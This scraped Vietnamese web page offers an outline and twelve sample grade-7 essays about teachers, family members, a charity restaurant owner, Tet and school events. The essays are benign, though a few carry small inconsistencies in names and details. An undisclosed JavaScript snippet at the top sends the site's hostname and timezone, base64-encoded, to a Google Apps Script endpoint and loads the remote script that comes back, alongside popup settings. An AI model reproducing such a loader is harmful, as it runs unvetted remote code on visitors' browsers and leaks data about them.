var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Văn mẫu lớp 7: Viết bài văn biểu cảm về con người hoặc sự việc Dàn ý & 12 bài văn mẫu lớp 7

Trong cuộc sống, chúng ta sẽ bắt gặp nhiều người, hoặc có những sự việc đem lại nhiều cảm xúc, ấn tượng. Chính vì vậy, hôm nay, Download.vn sẽ cung cấp tài liệu Bài văn mẫu lớp 7: Viết bài văn biểu cảm về con người hoặc sự việc.

Viết bài văn biểu cảm về con người và sự việc

Nội dung chi tiết bao gồm dàn ý và 12 bài văn mẫu, dành cho các bạn học sinh lớp 7 khi hoàn thiện bài viết của mình. Mời tham khảo ngay sau đây.

Dàn ý bài văn biểu cảm về con người hoặc sự việc

Văn mẫu lớp 7: Viết bài văn biểu cảm về con người hoặc sự việc Dàn ý & 12 bài văn mẫu lớp 7

1. Mở bài

  • Giới thiếu người và sự việc mà em muốn bày tỏ tình cảm, suy nghĩ.
  • Bày tỏ tình cảm, ấn tượng ban đầu của em về người, sự việc đó.

2. Thân bài

– Giới thiệu chung:

  • Người đó là ai? Sự việc đó là gì?
  • Người hoặc sự việc đó có đặc điểm nào nổi bật?

– Trình bày cảm xúc, suy nghĩ về những đặc điểm nổi bật của người hoặc sự việc:

– Nêu ấn tượng và người hoặc sự việc.

3. Kết bài

Khẳng định lại tình cảm, suy nghĩ của em đối với người, sự việc được nói tới.

Tìm ý bài văn biểu cảm về con người hoặc sự việc

Văn mẫu lớp 7: Viết bài văn biểu cảm về con người hoặc sự việc Dàn ý & 12 bài văn mẫu lớp 7

Bài văn biểu cảm về con người

Bài văn mẫu số 1

Từ xưa đến nay, dân tộc Việt Nam vẫn có truyền thống “tôn sư trọng đạo”. Thầy có là những người có công ơn dạy dỗ, dìu dắt chúng ta trong hành trình tìm đến với tri thức. Trong cuộc đời, mỗi người hẳn đều có một người thầy, cô giáo mà bản thân rất kính trọng. Và tôi cũng như vậy.

Người giáo viên mà tôi yêu quý và kính trọng nhất là cô Nguyễn Thu Hà. Cô là giáo viên chủ nhiệm của lớp tôi, cũng là giáo viên dạy môn Ngữ văn. Năm nay, cô ba mươi sáu tuổi. Khuôn mặt của cô trông rất hiền dịu. Nước da trắng hồng, cùng mái tóc dài ngang vai. Đôi mắt với ánh nhìn dịu dàng. Nụ cười của cô luôn rạng rỡ trên môi. Mỗi khi đến lớp, cô thường mặc những trang phục đơn giản, nhưng toát lên vẻ thanh lịch. Tôi cảm thấy cô rất xinh đẹp, trẻ trung.

Trong giờ học, cô là một giáo viên rất nghiêm khắc. Dù vậy, cô cũng rất tâm lí. Cô luôn dành thời gian để truyền đạt cho học sinh kiến thức của môn học một cách tốt nhất. Giọng nói của cô vừa truyền cảm, vừa ấm áp. Tôi rất yêu thích giọng nói của cô. Mỗi khi có bạn không chú ý nghe giảng, cô đều nhắc nhở nhẹ nhàng. Cô rất hay ở lại lớp trong những giờ ra chơi để trò chuyện cùng chúng tôi. Cô tâm sự với cả lớp rất nhiều điều: từ việc học tập, đến vấn đề trong cuộc sống. Nhờ có cô, tôi cảm thấy học được rất nhiều điều bổ ích.

Tôi còn nhớ mãi một kỉ niệm về cô. Hôm đó, cô gọi tôi lên bảng để kiểm tra bài cũ. Nhưng tối hôm trước, tôi đã không học bài do mải xem phim. Khi nghe cô hỏi, tôi không trả lời được câu hỏi. Lúc đó, tôi nhìn thấy ánh mắt của cô rất buồn. Từ trước tới nay, tôi luôn là một học sinh chăm chỉ. Việc xảy ra ngày hôm nay có lẽ đã khiến cô cảm thấy thất vọng. Cô không trách mắng, mà yêu cầu tôi về chỗ. Cả buổi học hôm đó, tâm trạng của tôi rất nặng nề. Tôi tự trách bản thân. Cuối buổi học, tôi đã chủ động lên xin lỗi cô. Lời nhắc nhở của cô khiến tôi còn nhớ mãi. Nhờ có cô, tôi mới ý thức học tập chăm chỉ hơn.

“Một chữ là thầy, nửa chữ cũng là thầy” – Đó là câu tục ngữ đề cao vai trò của người giáo viên. Bởi vậy, tôi luôn tự nhắc nhở bản thân phải yêu quý và kính trọng cô giáo của mình.

Bài văn mẫu số 2

“Cơm cha, áo mẹ, chữ thầy Gắng công mà học có ngày thành danh”

Thầy cô giáo giống như những người lái đò thầm lặng đã dìu dắt biết bao thế hệ học trò đến với bến bờ của tri thức.

Cô Nguyễn Phương là người giáo viên mà em cảm thấy vô cùng yêu mến. Cô là giáo viên chủ nhiệm năm lớp 6 của em. Năm nay, cô khoảng ba mươi lăm tuổi. Dáng người của cô nhỏ nhắn, thanh mảnh. Mái tóc đen dài, luôn được buộc gọn gàng. Cô cao khoảng một mét sáu mươi lăm. Khuôn mặt trái xoan với nước da trắng hồng rạng rỡ. Đôi mắt sáng với ánh nhìn toát ra vẻ dịu dàng. Mỗi khi nhìn vào ánh mắt ấy, em cảm nhận được sự yêu thương mà cô dành cho học trò. Cô có giọng nói ấm áp, dịu dàng. Mỗi khi cô giảng bài, chúng em đều say sưa lắng nghe.

Em cảm thấy cô là một giáo viên vô cùng nhiệt huyết. Mỗi giờ học, cô đều yêu cầu chúng em chú ý lắng nghe bài giảng. Không chỉ vậy, cô còn tạo ra bầu không khí sôi nổi, vui vẻ để tiết học hiệu quả hơn. Mỗi khi có một bạn học sinh không hiểu bài là cô sẽ kiên nhẫn giảng lại. Ngoài giờ học, cô Nguyễn Phương vẫn dành cho học trò sự quan tâm. Chúng em đều rất yêu quý cô.

Mỗi kỉ niệm về cô đều khiến em cảm thấy trân trọng. Tuy bây giờ, em không còn được học cô nữa, nhưng em vẫn nhớ đến cô với những tình cảm tốt đẹp, và lòng kính trọng vô cùng.

Có thể thấy rằng, mỗi người thầy, người cô đều đáng kính, đáng yêu. Bởi vậy, chúng ta hãy luôn dành cho họ sự tôn trọng, yêu mến.

Bài văn mẫu số 3

Thầy cô – những người thầm lặng đã dìu dắt chúng ta nên người. Bởi vậy, em luôn dành cho họ sự yêu mến, kính trọng.

Người giáo viên em yêu mến nhất là thầy Cường. Thầy là giáo viên chủ nhiệm năm lớp 6 của tôi. Cũng là giáo viên phụ trách dạy môn Toán của lớp em. Thầy đã gần năm mươi tuổi rồi. Dáng người cao, khá gầy. Mái tóc thầy đã điểm những sợi điểm bạc. Đôi mắt với ánh nhìn hiền từ. Giọng nói trầm ấm, nhẹ nhàng.

Thầy Cường là một giáo viên rất nhiệt huyết. Trong công việc, thầy luôn chỉn chu, nghiêm túc. Mỗi bài giảng đều được thầy chuẩn bị rất cẩn thận. Những giờ học của thầy cung cấp cho chúng em rất nhiều kiến thức. Sau mỗi giờ học tập căng thẳng, thầy lại trò chuyện với chúng em. Những câu chuyện khiến cả lớp thêm vui vẻ, thoải mái hơn. Thầy cũng rất quan tâm đến học sinh. Thầy luôn động viên chúng em cố gắng học tập. Các phong trào của lớp, thầy đều hướng dẫn, theo sát. Chúng em đều cảm thấy yêu mến, kính trọng thầy.

Không chỉ là kiến thức về môn Toán, thầy cũng đã dạy cho chúng em nhiều bài học về cách làm người. Em vẫn còn nhớ những ngày đầu mới bỡ ngỡ bước chân vào mái trường Trung học cơ sở, thầy đã chia sẻ nhiều điều bổ ích. Thầy luôn theo sát từng học sinh để giúp chúng em dễ dàng hòa nhập với môi trường mới. Khi học trò của mình mắc lỗi, thầy lại nhẹ nhàng nhắc nhở, bảo ban. Còn khi cả lớp đạt được kết quả tốt trong học tập, hay thi đua thì thầy lại động viên, khen ngợi. Mỗi kỉ niệm về thầy đều thật đáng quý.

Thầy cô giáo là những người đáng kính. Từ tận đáy lòng, em muốn dành cho họ lời tri ân. Em sẽ luôn nhớ đến thầy Cường, người giáo viên nhiệt huyết.

Bài văn mẫu số 4

“Biết trẻ con khao khát Chuyện ngày xưa, ngày sau Không hiểu là từ đâu Mà bà về ở đó Kể cho bao chuyện cổ Chuyện con cóc, nàng tiên Chuyện cô Tấm ở hiền Thằng Lý Thông ở ác… Mái tóc bà thì bạc Con mắt bà thì vui Bà kể đến suốt đời Cũng không sao hết chuyện”

(Chuyện cổ tích về loài người, Xuân Quỳnh)

Tuổi thơ của mỗi đứa trẻ đều sẽ gắn bó với bà. Chúng ta lớn lên nhờ những câu chuyện kể hay lời răn dạy của bà. Và đối với tôi, bà nội chính là một điểm tựa tinh thần vững chắc.

Bà của tôi đã gần bảy mươi tuổi. Nhưng sức khỏe của bà vẫn còn rất tốt. Trước đây, bà là một giáo viên tiểu học.Bà có dáng người khá đầy đặn. Khuôn mặt trông rất phúc hậu. Làn da đã có nhiều nếp nhăn. Mái tóc đã điểm nhiều sợi bạc. Đôi bàn tay có nhiều vết chai sần. Đôi mắt không còn tinh tường như trước, nhưng luôn sáng ngời tình yêu thương. Bà rất nhân hậu và hiền từ. Đối với con cháu, bà luôn quan tâm, lo lắng. Mọi người trong gia đình đều yêu mến và kính trọng bà.

Còn với riêng tôi, bà chính là cả khoảng trời kí ức. Tuổi thơ tôi sống cùng bà, gắn bó với bà hơn ai hết. Từ khi còn nhỏ, bố mẹ vẫn luôn bận rộn công việc. Bà là người đã chăm sóc tôi từ cái ăn đến giấc ngủ. Lời ru ngọt ngào của bà đã đưa tôi vào giấc ngủ say. Đến bây giờ, tôi vẫn còn nhớ âm thanh ấm áp đó. Khi lớn hơn, tôi thích được nằm nghe bà kể chuyện. Những truyện cổ tích về chàng Thạch Sanh, chị em Tấm Cám hay cậu bé thông minh được bà kể lại thật hấp dẫn. Không chỉ vậy, bà còn dạy cho tôi những điều hay lẽ. Bà cũng dạy tôi phải biết yêu thương, chia sẻ với mọi người xung quanh. Nhờ có bà, tôi đã trở thành một đứa trẻ ngoan ngoãn, sống đẹp hơn mỗi ngày.

Bà luôn là tấm gương sáng cho các thành viên trong gia đình noi theo. Khi con cháu mắc sai lầm, bà sẽ răn dạy, đưa ra những lời khuyên đúng đắn. Mỗi lúc buồn phiền chuyện gì đó bà cũng là nơi để chúng tôi chia sẻ. Lời động viên của bà giúp mọi người cảm thấy tự tin hơn, mạnh mẽ hơn. Tôi càng thêm trân trọng bà nội nhiều hơn. Vì vậy, tôi mong sao bà luôn sống khỏe mạnh, vui vẻ bên con cháu.

Người bà cũng giống như người mẹ, đem đến cho chúng ta tình cảm yêu thương ngọt ngào, ấm áp. Vì vậy, mỗi người hãy biết trân trọng và yêu thương người bà của mình nhiều hơn.

Bài văn mẫu số 5

Maksim Gorky từng viết:

“Trời không ánh sáng hoa nào nở Dạ vắng yêu thương cảnh những sầu Đời thiếu mẹ hiền không phụ nữ Anh hùng thi sĩ hỏi còn đâu.”

Quả vậy, người mẹ có vai trò thật quan trọng đối với mỗi người. Bởi vậy, chúng ta cần dành cho mẹ sự kính trọng và yêu thương.

Với em, mẹ là người quan trọng nhất trong cuộc đời. Năm nay, mẹ đã bốn mươi tuổi nhưng trông mẹ vẫn rất trẻ trung. Khuôn mặt của mẹ rất phúc hậu, cùng một nụ cười dịu dàng. Làn da vẫn còn trắng hồng. Đôi bàn tay mẹ thon dài, có vết chai dày ở đầu ngón tay, do nhiều năm cầm bút, cầm phấn. Giọng nói của mẹ vô cùng trong trẻo, mềm mại. Mái tóc của mẹ dài, đen nhánh và mềm mượt.

Mẹ em là một y tá. Công việc của mẹ rất bận rộn. Nhưng mẹ vẫn luôn dành thời gian cho gia đình. Buổi tối, mẹ thường về sớm để nấu cơm cho cả nhà. Với mẹ, bữa tối rất quan trọng, bởi đó là khi các thành viên đều có mặt đông đủ. Mẹ cũng rất chăm lo cho em từ cách ăn mặc, đến chuyện học tập. Khi còn nhỏ, mẹ dạy em cách sống tự lập. Đến khi lớn lên, mẹ dạy em cách ăn nói, ứng xử. Mẹ cũng là “một người bạn lớn” mà em có thể tâm sự, sẻ chia.

Càng trưởng thành, em càng thấy hạnh phúc, biết ơn. Bởi từ khi thơ bé vẫn còn nằm trong bụng mẹ và được mẹ bao bọc che chở. Đến khi sinh ra, mẹ là người chăm sóc, nuôi lớn em. Nhờ có bầu sữa ngọt ngào của mẹ mà em đã lớn lên từng ngày. Những bước đi nhỏ bé đầu tiên đến những bước đi lớn lao vĩ đại, người mẹ vẫn luôn dõi theo từng bước. Bởi vậy, em tự hứa sẽ cố gắng học tập thật tốt, luôn ngoan ngoãn để mẹ luôn vui lòng.

Người mẹ – một điểm tựa tinh thân vô cùng vững chắc cho mỗi người trong cuộc hành trình đầy gian khó tìm đến với thành công. Từ tận đáy lòng, em muốn gửi tất cả những lời yêu thương nhất dành cho người mẹ của mình.

Bài văn mẫu số 6

“Sống trong đời sống cần có một tấm lòng…” – Những lời trong bài hát “Để gió cuốn đi của cố nhạc sĩ Trịnh Công Sơn đã gợi nhắc trong một người bài học về tình yêu thương trong cuộc sống.

Tôi đã biết được đến rất nhiều tấm gương về lòng nhân hậu. Nhưng trong đó, tôi ấn tượng nhất về anh Trần Phước Hòa. Anh là chủ của quán cơm chay Thiên Phước 5.000 đồng trên đường Nguyễn Chí Thanh, Quận 11, Thành phố Hồ Chí Minh.

Khoảng hai mươi năm trước, anh cũng giống như những người dân lao động nghèo, phải bôn ba đến nơi khác để kiếm sống. Và anh đã dừng quyết định dừng chân tại mảnh đất Sài Gòn tấp nập, nhộn nhịp để kiếm sống. Anh Hòa từng làm rất nhiều nghề lao động chân tay, cuộc sống khó khăn để gây dựng cơ nghiệp. Sau nhiều năm nỗ lực không ngừng, hiện nay, anh đang là chủ của một cơ sở kinh doanh chuối chiên có tiếng trong thành phố với mức thu nhập khá dư dả. Với tấm lòng tốt của mình, anh đã quyết định mở tiệm cơm chay Thiên Phước để giúp đỡ mọi người xung quanh.

Quán cơm chay từ thiện đầu tiên được mở vào năm 2013. Đến này, quán vẫn hoạt động. Theo như lời anh nói thì ở thành phố Sài Gòn này, ai cũng sẽ có cơ hội, chỉ cần cho người ta một hy vọng. Vậy nên, quán cơm của anh mới đề dòng chữ: “San sẻ bữa trưa hàng ngày với người có thu nhập chưa cao”. Anh cũng kể rằng ban đầu anh dự tính quán sẽ không thu tiền của khách. Nhưng sau đó, anh nghĩ rằng quán vẫn cần một số tiền nhỏ để duy trì. Không chỉ vậy những người lao động cũng sẽ có cảm giác phụ thuộc nếu nhận cơm miễn phí trong một thời gian dài. Anh Hòa còn hiểu rõ nếu không lấy tiền thì khách hàng sẽ không thoải mái. Bởi dù không có thu nhập không cao, nhưng họ đều là những con người có lòng tự trọng, mong muốn được đối xử công bằng như mọi người, chứ không ai muốn “ăn nhờ” mãi.

Nhiều người lao động trở thành khách quen của quán, thường xuyên quyên góp thực phẩm cho quán. Có khi thì bao gạo, có khi thì chai dầu ăn hay nước mắm. Dù nhỏ bé nhưng đã thể hiện được tấm lòng của mọi người. Tất cả đã thể hiện tấm lòng tương thân tương ái của con người.

Tấm gương của anh Trần Phước Hòa đã khiến tôi cảm thấy vô cùng ấn tượng và khâm phục. Không chỉ vậy, tôi cũng có thêm niềm tin vào cuộc sống vẫn còn những điều tốt đẹp hơn.

Bài văn biểu cảm về sự việc

Bài văn mẫu số 1

Những sự việc xảy ra trong cuộc đời đều đem đến một bài học cho mỗi người. Và em cũng đã trải qua một sự việc khiến em nhớ mãi.

Đầu năm học lớp bảy, gia đình của em chuyển vào Nam sống. Em phải học ở một ngôi trường mới. Do tính cách khá nhút nhát, em chưa làm quen được với nhiều bạn trong lớp. Em còn nhớ đó ngày hôm đó, lớp em có giờ kiểm tra môn Ngữ Văn. Khi em đang ngồi ôn tập lại bài thì nghe thấy có bạn gọi tên mình:

– Thúy Hạnh ơi, cậu có bút bi màu đen không? Cho tớ mượn một chiếc với. Lát nữa có giờ kiểm tra mà bút của tớ hết mực mất rồi. Chẳng có bạn nào đem theo bút bi đen cả.

Em quay lại thì nhận ra đó là Hà Phương – người bạn ngồi phía sau em. Cả chỉ chào hỏi nhau khi em mới chuyển vào lớp. Dù vậy, em vẫn vui vẻ mở hộp bút của mình ra, rồi đưa bạn chiếc bút còn lại của mình.

– Mình có! Cho bạn mượn này!

Bạn mỉm cười rồi nhìn hỏi em:

– Mình cảm ơn bạn nhé!

Em nói với bạn:

– Không có gì đâu!

Sau giờ kiểm tra hôm đó, vào giờ ra chơi, Hà Phương trả bút cho em. Bạn còn chủ động bắt chuyện với em. Cả hai đã trò chuyện rất vui vẻ. Em nhận ra mình và Phương có rất nhiều điểm chung. Kể từ hôm đó, chúng em đã trở thành những người bạn tốt của nhau.

Sự việc xảy ra lần đó đã giúp em làm quen thêm được một người bạn mới. Em rất trân trọng tình bạn với Hà Anh. Em cũng mong rằng cả hai sẽ luôn là những người bạn tốt của nhau.

Bài văn mẫu số 2

Một trong những dịp lễ quan trọng của người dân Việt Nam chính là Tết Nguyên Đán. Và mỗi dịp Tết đến xuân về, lòng em lại cảm thấy vô cùng hân hoan và háo hức.

Những ngày gần Tết, khắp nơi đều được trang trí cờ hoa rực rỡ. Mọi con đường được quét dọn sạch sẽ, các phương tiện giao thông đi lại tấp nập. Không khí vui tươi, rộn ràng tràn ngập trên từng thôn xóm, khu phố. Đặc biệt là những khu chợ lúc nào cũng đông đúc người mua, người bán. Các mặt hàng Tết được bày bán rất nhiều như bánh kẹo, mứt Tết, hoa quả…

Trước Tết, nhà nào cũng dọn dẹp nhà cửa sạch sẽ để đón chào một năm mới sắp đến. Gia đình của em cũng vậy. Mỗi người một công việc khác nhau. Tuy bận rộn, nhưng lại rất vui vẻ. Em cũng phụ giúp bố mẹ quét sân, lau nhà hay tưới cây trong vườn… Sau đó, mọi người cùng nhau đi chợ hoa. Bố của em mua được một chậu đào và một chậu quất rất đẹp. Còn mẹ em mua rất nhiều loại hoa về để chơi mấy ngày tết. Thích nhất là em đã được ngồi xem ông bà, bố mẹ gói bánh chưng. Em còn tự tay gói một chiếc bánh theo sự hướng dẫn của ông nội. Những chiếc bánh chưng vuông tượng trưng cho trời, là một món ăn không thể thiếu trong dịp Tết cổ truyền từ xưa cho đến nay.

Chiều ba mươi Tết, các thành viên trong gia đình cùng quây quần bên mâm cơm Tất niên, vừa ăn uống, vừa trò chuyện với nhau về những điều đã xảy ra trong một năm vừa qua. Đến tối, mọi người lại ngồi trước màn hình vô tuyến để xem chương trình “Táo Quân”. Đúng mười hai giờ, em cùng với chị gái lên tầng thượng để xem pháo hoa. Còn ông nội sẽ thắp hương cúng Giao thừa.

Sáng mùng một một Tết, em cùng với chị gái cũng thức dậy, mặc quần áo thật đẹp và xuống nhà để chúc Tết ông bà, bố mẹ. Hai chị em đã được nhận những phong bao lì xì đỏ thắm cùng với lời chúc thật ý nghĩa. Sau đó, cả gia đình sẽ cùng nhau đi chúc Tết họ hàng.

Những ngày tết, em đã có thật nhiều kỉ niệm đẹp đẽ bên gia đình. Em cảm thấy trân trọng dịp Tết cổ truyền của dân tộc.

Bài văn mẫu số 3

“Thời gian trôi qua mau chỉ còn lại những kỷ niệm. Kỷ niệm thân yêu ơi, sẽ còn nhớ mãi tiếng thầy cô. Bạn bè mến thương ơi, sẽ còn nhớ những lúc giận hờn. Để rồi mai chia xa lòng chợt dâng niềm thiết tha. Nhớ bạn bè, nhớ mái trường xưa…”. Những câu hát trong bài “Mong ước kỷ niệm xưa” đã gợi nhắc cho tôi nhớ về ngày khai trường dưới mái trường Trung học cơ sở.

Sự việc xảy ra vào một buổi sáng mùa thu tuyệt đẹp. Thời tiết mát mẻ, dễ chịu vô cùng. Tôi thức dậy thật sớm, chuẩn bị sách vở đầy đủ và mặc bộ đồng phục mới tinh. Đúng bảy giờ, tôi đạp xe đến trường. Trên đường đi, tôi cảm thấy thật háo hức, cũng đầy lo âu. Ngày hôm nay, tôi đã chính thức trở thành một học sinh Trung học cơ sở. Thật đáng tự hào biết bao!

Con đường đến trường vốn đã quen thuộc. Trường Tiểu học của tôi cũng nằm gần đây. Trước đây, tôi thường được mẹ đèo đi học trên con đường này. Nhưng hôm nay, tôi đã lớn hơn và tự mình đạp xe đến trường. Chỉ khoảng mười lăm phút, tôi đã đến trường. Trước cổng trường thật đông đúc người, đó là những học sinh và cả phụ huynh đưa con đến trường. Khuôn mặt ai cũng rạng rỡ, hân hoan. Hôm nay, ngôi trường thật đẹp. Sân trường đã được quét dọn sạch sẽ. Những hàng ghế được xếp ngay ngắn. Trên sân khấu có treo một tấm băng rôn màu xanh. Ở đó có gắn dòng chữ màu trắng: “LỄ KHAI GIẢNG” ở chính giữa. Phía bên dưới là tên trường “THCS….”. Hai bên sân khấu cũng được treo những lá cờ đỏ thắm. Chiếc trống nằm im một góc. Ngay cả nó cũng đã được trang trí bằng một chiếc nơ màu đỏ rất đẹp.

Buổi lễ khai giảng bắt đầu vào đúng bảy giờ ba mươi phút. Một hồi trống giòn giã vang lên yêu cầu học sinh ổn định chỗ ngồi. Những tiết mục văn nghệ do các anh chị học sinh trình bày đã mở đầu cho buổi lễ khai giảng. Tiếp đến là phần tổng kết về năm học cũ, cũng như mục tiêu của năm học mới của cô Hoa – tổng phụ trách. Sau phần phát biểu của cô, tôi sẽ đại diện cho học sinh khối lớp sáu phát biểu cảm nghĩ. Tôi cảm thấy khá hồi hộp Đây là lần đầu tiên tôi đứng phát biểu trước đông người như vậy. Nhưng nhờ có sự động viên của cô giáo tổng phụ trách, tôi đã có thêm sự tự tin. Phần trình bày của tôi đã rất trôi chảy, còn nhận được tràng pháo tay của mọi người nữa. Lần đầu tiên, tôi có cơ hội đứng trước toàn trường, thay mặt cho học sinh khối sáu, trình bày cảm nhận của mình. Đây chính là một niềm vinh dự của tôi.

Bài văn mẫu số 4

Tết Nguyên Đán là một dịp vô cùng quan trọng đối với mỗi người dân Việt Nam. Bởi vậy mà tôi vô cùng háo hức mỗi dịp Tết đến, xuân về.

Vậy là một mùa xuân nữa lại về. Dịp Tết cổ truyền cũng đã đến. Trong lòng mỗi người đều cảm thấy hân hoan. Còn quê hương của tôi giống như được khoác lên mình một chiếc áo mới vậy. Các con đường đều được quét dọn sạch sẽ. Làng xóm rực rỡ trong sắc đỏ của cờ hoa. Hai bên đường, nhà cửa đều được trang hoàng hơn. Các phương tiện giao thông đi lại tấp nập. Ở các khu chợ, người mua bán rất đông đúc, sôi nổi.

Gia đình của tôi đã chuẩn bị đón Tết từ sớm. Hai mươi bảy Tết, công việc dọn dẹp nhà cửa chính thức bắt đầu. Tuy bận rộn, nhưng mọi người đều cảm thấy vui vẻ. Hôm sau, tôi được đi chợ hoa cùng bố mẹ. Bố đã chọn được một chậu hoa đào, và một chậu quất rất to.

Đặc biệt nhất là vào chiều ba mươi Tết, các thành viên trong gia đình cùng nhau quây quần bên mâm cơm Tất niên. Trước khi nhập tiệc, ông nội còn thay mặt các thành viên trong gia đình nói lời tổng kết cho một năm đã qua. Sau đó, mọi người cùng nâng ly nói: “Chúc mừng năm mới”. Đến mười hai giờ đêm, tôi và chị gái sẽ thức để xem pháo hoa. Sáng mùng một Tết, mọi người sẽ mặc những bộ quần áo đẹp nhất để đi chúc Tết. Khuôn mặt ai cũng vui vẻ, rạng rỡ. Không khí vui tươi đang tràn ngập khắp mọi người.

Ngày Tết cổ truyền đã đem đến cho con người nhiều điều thú vị. Các gia đình lại có cơ hội được quây quần bên nhau, ôn lại một năm cũ đã qua và chờ đón những điều tốt đẹp sắp đến. Thật tuyệt vời biết bao nhiêu!

Bài văn mẫu số 5

Có những sự việc xảy ra khiến chúng ta cảm thấy nhớ mãi. Và bản thân tôi cũng đã từng trải qua những sự việc như vậy.

Hồi ấy, dù là con gái nhưng tôi lại rất nghịch ngợm. Năm lớp năm, tôi thường tham gia cùng các bạn con trai vào những trò nghịch phá. Một lần, chúng tôi rủ nhau trốn tiết học thể dục để ra ngoài cổng trường mua quà vặt. Nhưng không may, cả nhóm đã bị cô giáo bắt gặp. Cô đã yêu cầu chúng tôi nhanh chóng trở lại lớp. Cuối buổi hôm ấy có giờ sinh hoạt, cô giáo đã nghiêm túc phê bình chúng tôi trước cả lớp. Và cô cũng nói rằng sẽ đến gặp và trao đổi với phụ huynh. Khi đó, vì còn nhỏ nên tôi chỉ cảm thấy sợ hãi. Nhưng trong lòng không hề cảm thấy có lỗi.

Ngày hôm sau khi cô giáo đến nhà nói chuyện với mẹ xong và ra về. Mẹ đã gọi tôi đến bên và nhắc nhở. Chính vào lúc đó, tôi đã có những thái độ và lời nói không lễ phép với mẹ. Đến khi nhận được lá thư của bố viết cho tôi. Bố đã nghiêm khắc phê bình thái độ đó của tôi. Và kể lại những kỉ niệm khi tôi còn thơ ấu, mẹ đã phải thức suốt đêm để chăm sóc cho tôi ở bệnh viện khi tôi bị ốm. Bức thư của bố khiến tôi vô cùng xúc động và cảm thấy có lỗi. Chiều hôm ấy, khi mẹ đi làm về, tôi ngập ngừng chạy đến ôm lấy mẹ, xin lỗi mẹ. Nước mắt tôi cứ thế rơi lúc nào chẳng hay. Mẹ cũng khóc và an ủi tôi. Bố vừa đi làm về thấy hai mẹ con ôm nhau khóc thì cũng chạy đến ôm lấy chúng tôi.

Kể từ đó, tôi dường như trưởng thành hơn. Tôi đã biết giúp đỡ bố mẹ những công việc vặt trong gia đình. Cũng trở nên ngoan ngoãn hơn, chịu khó học tập hơn. Tôi cũng hiểu được rằng, cho dù có thế nào. Bố mẹ cũng luôn bao dung và yêu thương tôi vô điều kiện.

Một sự việc để lại cho tôi bài học vô cùng quý báu và giá trị. Tôi sẽ cố gắng để hoàn thiện bản thân hơn, khiến cho bố mẹ cảm thấy tự hào.

Bài văn mẫu số 6

Mỗi khi Tết đến là thời điểm gia đình cùng nhau quây quần bên nhau. Và gia đình em cũng vậy, em cảm thấy vô cùng háo hức và sung sướng.

Những ngày giáp Tết, đường phố những ngày tết lúc nào cũng đông đúc, tấp nập. Những khu chợ rộn nhịp tiếng nói của người mua người bán. Chợ hoa Tết rực rỡ sắc màu của trăm loài hoa khoe sắc. Những cây đào, cây mai, cây quất đã trở thành biểu tượng của dịp Tết cổ truyền dân tộc.

Cả gia đình cùng nhau chuẩn bị để đón Tết. Người lớn chuẩn bị mua sắm đồ Tết. Trẻ con háo hức mong từng ngày được nghỉ học. Khắp các khu chợ bỗng tấp nập hẳn lên. Tiếng người mua bán thật nhộn nhịp. Chợ Tết rất nhiều các mặt hàng từ đồ ăn, thức uống đến quần áo, giày dép… Ngày Tết chuộng nhất là màu đỏ, bởi vậy cả khu chợ như được sắc đỏ thắm bao bọc, tượng trưng cho may mắn. Vào ba mươi Tết, cả nhà em lại sum vầy bên mâm cơm giao thừa. Cả gia đình vừa ăn uống, vừa trò chuyện với nhau về những điều đã xảy ra trong một năm vừa qua. Đêm giao thừa cả nhà ngồi xem chương trình “Táo Quân”. Đến đúng mười hai giờ, em cùng với chị gái lên tầng để xem pháo hoa. Màn pháo hoa rực rỡ khiến cho người xem cảm thấy xao xuyến. Khoảnh khắc chuyển giao giữa năm cũ và năm mới đem đến cho con người những cảm xúc thật đẹp đẽ.

Đến sáng mùng một một Tết, cả nhà em cùng nhau đi chúc Tết họ hàng. Mọi người đều mặc những bộ quần áo đẹp nhất. Những lời chúc mừng năm mới mong cho một năm may mắn, an khang và thịnh phượng. Em cũng giống như những đứa trẻ khác đều rất thích nhận được những bao lì xì đỏ thắm.

Em rất yêu ngày Tết quê em. Bởi Tết đã đem đến cho con người thật nhiều khoảng thời gian ý nghĩa bên gia đình thân yêu của mình. Mỗi người con trên đất nước Việt Nam này hãy biết trân trọng ngày tết cổ truyền của dân tộc.